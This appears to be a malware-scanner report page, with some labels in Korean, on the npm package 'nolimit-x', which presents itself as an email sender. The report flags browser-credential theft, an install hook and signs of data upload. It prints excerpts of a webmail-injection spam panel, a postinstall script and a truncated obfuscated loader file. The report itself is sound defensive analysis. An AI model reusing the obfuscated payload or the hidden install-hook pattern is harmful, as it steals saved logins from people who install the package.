// npm 패키지
nolimit-x
Advanced email sender
버전
230
메인테이너
1
라이선스
ISC
최초 publish
2025-07-01
publisher
nolimitaworkspace
tarball
1,096,056 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-06-04
// exfil path
what is read → where it shipssteals
- ● Chromium logins
- ○ home dir
- ○ system info
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> const { execSync } = require('child_process');
> prefix = execSync('npm config get prefix', { encoding: 'utf8' }).trim();
> const _0x30f815=_0x5a7c;(function(_0x3104de,_0x447954){const _0x38a420=_0x5a7c,_0x2dbc7e=_0x3104de();while(!![]){try{const _0xe4c8a4=-parseInt(_0x38a420(0x188,'ICE%'))/0x1*(-parseInt(_0x38a420(0x1b9,'…// offending code· @1.0.232· 3 files flagged
- @1.0.232··AUTO-PUBLISHED·publisher: nolimitaworkspaceheuristic 93/100static flags 7llm skippedinstall-scripts:postinstallpublish-burst:4new-publisher:13dpublisher-handle-randomlookingmature-packagereads-chromium-credsreads-homedirreads-system-infochild-process-spawnlong-base64-literalwebhook-binarchive-then-upload
// offending code· 3 files flaggedpatterns: 7
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly npm run build && node scripts/copy-native-binary.js --- package/src/web-panel/ws.js (excerpt) --- /* ============================================================ ws.js — Nolimit WebSend Panel Injected into the active webmail tab by the Chrome extension. Self-contained, no external dependencies. ============================================================ */ (async function () { 'use strict'; try { // Prevent double-inject if (document.getElementById('__nl-panel')) return; // Read config injected by extension background.js const stored = window.__nlConfig || {}; const config = { fromName : stored.fromName || '', subject : stored.subject || '', targets : stored.targets || [], template : stored.template || '', }; // ── Provider detection ──────────────────────────────────────── const host = location.hostname; let provider = 'generic'; if (host.includes('mail.google.com')) provider = 'gmail'; if (host.includes('outlook.live.com') || host.includes('outlook.office.com')) provider = 'outlook'; if (host.includes('mail.yahoo.com')) provider = 'yahoo'; if (host.includes('mail.zoho.com')) provider = 'zoho'; if (host.includes('mail.proton.me')) provider = 'proton'; const providerLabel = { gmail: 'Gmail', outlook: 'Outlook', yahoo: 'Yahoo', zoho: 'Zoho', proton: 'ProtonMail', generic: 'Webmail' }[provider]; // ── Spintax resolver ────────────────────────────────────────── function resolveSpintax(str) { return str.replace(/\{([^{}]+)\}/g, (_, group) => { const opts = group.split( --- package/scripts/postinstall.js (excerpt) --- #!/usr/bin/env node // postinstall.js — fixes npm's failure to create the bin shim on Windows // when the bin entry points to a dotfile directory (e.g. .ad/x0.js). // This runs automatically after `npm i -g nolimit-x`. 'use strict'; const os = require('os'); const path = require('path'); const fs = require('fs'); const { execSync } = require('child_process'); if (os.platform() !== 'win32') process.exit(0); // Unix: npm handles it fine try { // Resolve npm global prefix let prefix; try { prefix = execSync('npm config get prefix', { encoding: 'utf8' }).trim(); } catch (_) { process.exit(0); // can't determine prefix — skip silently } const binDir = prefix; // on Windows global bin shims live directly in prefix const shimPath = path.join(binDir, 'nolimit.cmd'); const entryFile = path.resolve(__dirname, '..', '.ad', 'x0.js'); // Already exists — nothing to do if (fs.existsSync(shimPath)) process.exit(0); const shimContent = `@ECHO off\r\nSETLOCAL\r\nSET PATHEXT=%PATHEXT:;.JS;=;%\r\nnode "${entryFile}" %*\r\n`; fs.writeFileSync(shimPath, shimContent, 'utf8'); console.log(`[nolimit-x] Created bin shim: ${shimPath}`); } catch (e) { // Non-fatal — user can still run via `node .ad/x0.js` console.warn('[nolimit-x] postinstall: could not create bin shim:', e.message); } --- package/.ad/smtp-health-cache.js (excerpt) --- const _0x30f815=_0x5a7c;(function(_0x3104de,_0x447954){const _0x38a420=_0x5a7c,_0x2dbc7e=_0x3104de();while(!![]){try{const _0xe4c8a4=-parseInt(_0x38a420(0x188,'ICE%'))/0x1*(-parseInt(_0x38a420(0x1b9,'d#4O'))/0x2)+parseInt(_0x38a420(0x1d1,'iACy'))/0x3*(-parseInt(_0x38a420(0x1c8,'#F[f'))/0x4)+parseInt(_0x38a420(0x1a4,'kfuJ'))/0x5+parseInt(_0x38a420(0x18f,'M1JK'))/0x6*(parseInt(_0x38a420(0x186,'M1JK'))/0x7)+parseInt(_0x38a420(0x1ca,'Gt#%'))/0x8*(parseInt(_0x38a420(0x191,'*m*W'))/0x9)+parseInt(_0x38a420(0x1c0,'#F[f'))/0xa+parseInt(_0x38a420(0x1bf,'F5BG'))/0xb*(-parseInt(_0x38a420(0x189,'mEs]'))/0xc);if(_0xe4c8a4===_0x447954)break;else _0x2dbc7e['push'](_0x2dbc7e['shift']());}catch(_0x2e6be3){_0x2dbc7e['push'](_0x2dbc7e['shift']());}}}(_0x301a,0xa2a78));const _0x44b4d9=(function(){let _0x237bec=!![];return function(_0x1e4875,_0x565649){const _0x53e544=_0x237bec?function(){const _0xfcee14=_0x5a7c;if(_0x565649){const _0x43b9a2=_0x565649[_0xfcee14(0x1bd,'cWT*')](_0x1e4875,arguments);return _0x565649=null,_0x43b9a2;}}:function(){};return _0x237bec=![],_0x53e544;};}()),_0x1e3084=_0x44b4d9(this,function(){const _0x3da330=_0x5a7c;return _0x1e3084[_0x3da330(0x199,'0who')]()[_0x3da330(0x17d,'94&6')](_0x3da330(0x1c2,'#F[f'))['toString']()[_0x3da330(0x1d6,'fBI&')](_0x1e3084)[_0x3da330(0x1d3,'%6Ih')](_0x3da330(0x1bb,'6[*2'));});function _0x5a7c(_0x5bf93a,_0x3dadcc){_0x5bf93a=_0x5bf93a-0x17d;const _0x764d67=_0x301a();let _0x1e3084=_0x764d67[_0x5bf93a];if(_0x5a7c['QTveLf']===undefined){var _0x4
